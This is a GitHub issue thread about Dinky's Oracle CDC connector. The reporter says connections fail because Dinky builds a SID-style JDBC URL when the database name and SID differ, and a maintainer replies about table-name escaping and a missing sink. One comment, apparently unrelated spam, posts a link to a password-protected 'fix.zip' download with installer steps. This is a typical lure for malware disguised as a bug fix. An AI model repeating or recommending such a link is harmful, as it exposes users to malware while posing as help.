### ISSUE TITLE
During oracle cdc synchronization, the databasename and sid of the oracle source database are different, resulting in the inability to connect to the database.

### ISSUE THREAD

**Issue by QuintinLuke** [DataLinkDC/dinky#3755]
### Search before asking

- [X] I had searched in the [issues](https://github.com/DataLinkDC/dinky/issues?q=is%3Aissue) and found no similar issues.

### What happened

oracle cdc 同步时，oracle源库的databasename和sid是不一样的,导致无法连接数据库

### What you expected to happen

oracle cdc 同步时，oracle源库的databasename和sid是不一样的,导致无法连接数据库

### How to reproduce

oracle cdc 同步时，oracle源库的databasename和sid是不一样的,导致无法连接数据库

### Anything else

oracle cdc 同步时，oracle源库的databasename和sid是不一样的,导致无法连接数据库

### Version

dev

### Are you willing to submit PR?

- [X] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zzm0809** [comment]
描述过于简单请提供复现步骤

**Comment by QuintinLuke** [comment]
> 描述过于简单请提供复现步骤

<img width="866" alt="image" src="https://github.com/user-attachments/assets/bcea9e57-1947-4ac0-86ae-2bf9f9ac445a">
我看dinky的源代码是这样的，采用的是sid的模式（冒号拼接），但是我的oracle的databasename是helowin,sid是orcl,所以冒号拼接会报：listener does not currently know if sid given in connect descripter 错误。

**Comment by QuintinLuke** [comment]
> 描述过于简单请提供复现步骤

EXECUTE CDCSOURCE cdc_oracle WITH (
 'connector' = 'oracle-cdc',
 'hostname' = '127.0.0.1',
 'port' = '1521',
 'username' = 'root',
 'password' = '123456',
 'database-name' = 'ORCL',  -- Service Name
 'checkpoint' = '3000',
 'scan.startup.mode' = 'initial',
 'parallelism' = '1',
 'table-name' = 'TEST\..*',
 'url' = 'jdbc:oracle:thin:@//127.0.0.1:1521/ORCL'  -- 强制使用 Service Name 连接
);类似这样url并不生效

**Comment by Zzm0809** [comment]
> > 描述过于简单请提供复现步骤
> 
> EXECUTE CDCSOURCE cdc_oracle WITH ( 'connector' = 'oracle-cdc', 'hostname' = '127.0.0.1', 'port' = '1521', 'username' = 'root', 'password' = '123456', 'database-name' = 'ORCL', -- Service Name 'checkpoint' = '3000', 'scan.startup.mode' = 'initial', 'parallelism' = '1', 'table-name' = 'TEST..*', 'url' = 'jdbc:oracle:thin:@//127.0.0.1:1521/ORCL' -- 强制使用 Service Name 连接 );类似这样url并不生效

以上存在两个问题:
1. table-name 的值 应该是 `TEST\..*`
2. 没有 sink

如有疑问请提供完整的 不要提供一部分
